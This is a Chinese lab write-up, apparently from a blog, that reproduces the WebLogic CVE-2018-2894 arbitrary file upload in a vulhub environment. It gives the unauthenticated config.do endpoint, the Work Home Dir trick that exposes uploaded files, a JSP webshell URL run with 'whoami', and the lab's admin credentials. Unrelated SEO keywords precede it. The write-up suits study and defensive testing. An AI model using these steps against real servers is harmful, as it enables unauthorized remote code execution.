网站建设远洋国际,国家信用信息公示网查询官网,关键词优化的技巧,网站设计如何自学vulhub weblogic CVE-2018-2894 1、 搭建好靶场#xff0c;按提示访问 http://192.168.137.157:7001/console 按照给出的文档#xff0c;会查看容器的日志#xff0c;找到管理员用户名/密码为 weblogic / h3VCmK2L#xff0c;暂时用不到#xff0c;不需要登录
2、未授权… vulhub weblogic CVE-2018-2894 1、 搭建好靶场按提示访问 http://192.168.137.157:7001/console 按照给出的文档会查看容器的日志找到管理员用户名/密码为 weblogic / h3VCmK2L暂时用不到不需要登录
2、未授权访问http://192.168.137.157:7001/ws_utc/config.do这里存在一个任意文件上传的接口 没有做其他操作主要我好奇它把文件上传到哪去了 /u01/oracle/user_projects/domains/base_domain/tmp/WSTestPageWorkDir/config/keystore/1685608640016_ma.jsp 可以看到上传文件被重命名了加了一串前缀字符抓包之后发现是时间戳从响应包中可以得到至此文件名已被掌控关键还有一个路径怎么解决 下划线部分的这个路径在网站中也是可以自定义的 设置Work Home Dir为 /u01/oracle/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/com.oracle.webservices.wls.ws-testclient-app-wls/4mcj4y/war/css 。这个目录是ws_utc应用的静态文件css目录访问这个目录是无需权限的这一点很重要。 与css同级的目录META-INF WEB-INF css images js 我试了一下images目录也可以用js目录不行 访问 http://192.168.137.157:7001/ws_utc/images/config/keystore/1685608640016_ma.jsp?pwd666iwhoami
总结
上传的所有文件全路径格式都是/u01/oracle/user_projects/domains/base_domain/tmp/WSTestPageWorkDir/config/keystore/时间戳_filename.jsp
但是在 http://192.168.137.157:7001/ws_utc/config.do设置当前工作目录Work Home Dir之后上传文件的路径没有改变却能够访问了
写的很浅具体的漏洞原理我还没有去看有时间补
利用路径/ws_utc/[Work Home Dir设置的目录的最后一级目录名]/config/keystore/时间戳_filename.jsp